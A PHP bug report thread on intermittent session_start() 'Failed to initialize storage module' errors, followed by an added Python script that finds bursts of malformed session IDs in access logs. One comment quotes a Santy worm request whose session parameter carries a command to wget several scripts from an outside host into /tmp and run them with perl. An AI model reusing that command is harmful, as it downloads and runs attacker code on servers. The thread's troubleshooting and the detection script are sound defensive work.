ID:               25876
 Comment by:       jarratt at dotpixel dot net
 Reported By:      golden at riscom dot com
 Status:           Assigned
 Bug Type:         Session related
 Operating System: freebsd 4.8
 PHP Version:      4.3.9-4.3.10
 Assigned To:      sas
 New Comment:

Hi, 

We also seem to be experiencing this intermittent problem with a newly
compiled version of PHP 5.0.3 

Fatal error: session_start() [function.session-start]: Failed to
initialize storage module: user (path: ) in ...

Any ideas? I have two versions of PHP on my Fedora 1 box; if I switch to
the PHP 4.3.8 Fedora rpm version I have no issues.

The php.ini has session.save_handler = files set. Any suggestions?

Thanks


Previous Comments:
------------------------------------------------------------------------

[2004-12-30 02:18:57] aussie_jadu at hotmail dot com

We're experiencing the same error, with php 4.3.10 running on Redhat
7.3 with apache 1.3.31.

PHP Fatal error:  session_start(): Failed to initialize storage module:
user

------------------------------------------------------------------------

[2004-12-28 21:27:20] mak123 at poczta dot onet dot pl

I found many log lines with:

...&PHPSESSID=http://www.visualcoders.net/spy.gif?.....

or other session variables like osCsid, IDP, sess_id - and there is a
huge correlation between the number of such attacks and the time when sessions
hang with the 'Failed to initialize...' error. After 50 - 70 such requests
in 10 - 15 seconds PHP refused to handle the session_start() function.

------------------------------------------------------------------------

[2004-12-28 20:32:21] mak123 at poczta dot onet dot pl

I've added 'php_value session.save_handler "files"' line to config file
and errors disappeared.

------------------------------------------------------------------------

[2004-12-28 19:21:28] cruiser at ptcruiserclub dot org

I'm using php 4.3.10 on Apache2.4.20 on Redhat 9

Lots of this error repeating over and over in apache error_log:

"PHP Warning: 
Unknown(): A session is active. You cannot change the session module's
ini 
settings at this time. in Unknown on line 0"

All the errors correlate to the Santy worm attacks on my oscommerce
store in the apache access_log

/index.php?cPath=34&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt


Adding some mod_rewrite rules in httpd.conf to redirect the worm away
stopped the errors.

------------------------------------------------------------------------

[2004-12-28 12:33:28] mbi at euro-ip dot net

After the recompile of PHP 4.3.10 with a session.c of 4.3.9, the
problems seem to have disappeared. It's quite difficult to be sure,
because the problem only occurred once in a while (and it all took off
about a week after the initial upgrade). Some other people, using our
services, affected by the problems, tell me that they are gone by now
(without setting a session handler via ini_set).

I'm quite aware there are some unfixed bugs in the session.c of 4.3.9,
but the other way was quite unacceptable for production usage.

Maybe somebody with better knowledge of the code should take a look at
the changes between 4.3.9 and 4.3.10 in "session.c".

We're using Apache 1.3.33 with PHP 4.3.10, mod_ssl 2.8.22 on FreeBSD
4.10-RELEASE-p3. The current configuration has been rock-solid for
months and besides some minor upgrades to Apache, PHP and some minor OS
fixes, nothing interesting happened to the systems in question.

We also noticed this on all of our frontend shared hosting servers.

------------------------------------------------------------------------

The remainder of the comments for this report are too long. To view
the rest of the comments, please view the bug report online at
    http://bugs.php.net/25876

-- 
Edit this bug report at http://bugs.php.net/?id=25876&edit=1
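
A log check for the pattern the 2004-12-28 comments describe, added here as an example (it is not part of the bug report or of PHP): it flags requests whose session parameter holds something that cannot be a session ID and reports the densest burst of them. The parameter names come from the comments; the ID pattern, the 15-second window, the combined log format and the sample lines are assumptions constructed for the example.

```python
import re
from collections import deque
from datetime import datetime, timedelta
from urllib.parse import parse_qsl

# Session parameter names mentioned in the comments above.
SESSION_PARAMS = {"PHPSESSID", "osCsid", "IDP", "sess_id"}
# Assumption: a legitimate session ID is a short token of letters, digits, ',' or '-'.
VALID_ID = re.compile(r"[A-Za-z0-9,-]{1,128}")
# Assumption: Apache common/combined log format.
LOG_LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" \d{3}')

def bad_session_params(target):
    """Return (name, value) pairs whose value cannot be a session ID."""
    query = target.partition("?")[2]
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if k in SESSION_PARAMS and not VALID_ID.fullmatch(v)]

def peak_burst(lines, window=timedelta(seconds=15)):
    """Return (peak, sources): the most malformed-session requests seen
    inside one window, and the clients that sent them.
    Lines are expected in chronological order, as in an access log."""
    recent, peak, sources = deque(), 0, set()
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or not bad_session_params(m.group(3)):
            continue
        ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
        recent.append((ts, m.group(1)))
        while ts - recent[0][0] > window:   # drop hits older than the window
            recent.popleft()
        if len(recent) > peak:
            peak, sources = len(recent), {ip for _, ip in recent}
    return peak, sources

def sample_log():
    """Constructed log lines: documentation addresses, placeholder host."""
    bad = "/index.php?cPath=34&osCsid=http://worm.example.invalid/spy.gif?"
    good = "/index.php?cPath=34&osCsid=9f2c4e1ab07d5c3e8a6b1d2f4c5e7a90"
    fmt = '192.0.2.{} - - [28/Dec/2004:19:21:{:02d} +0000] "GET {} HTTP/1.0" 200 512'
    lines = [fmt.format(i % 20 + 1, i // 5, bad) for i in range(60)]
    return lines + [fmt.format(200, s, good) for s in (3, 7, 40)]

if __name__ == "__main__":
    peak, sources = peak_burst(sample_log())
    print(f"peak of {peak} malformed session IDs in 15 s from {len(sources)} clients")
```

A peak in the range the comment reports (50 to 70 requests in 10 to 15 seconds) is the point at which to compare timestamps against the 'Failed to initialize storage module' entries in the error log.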
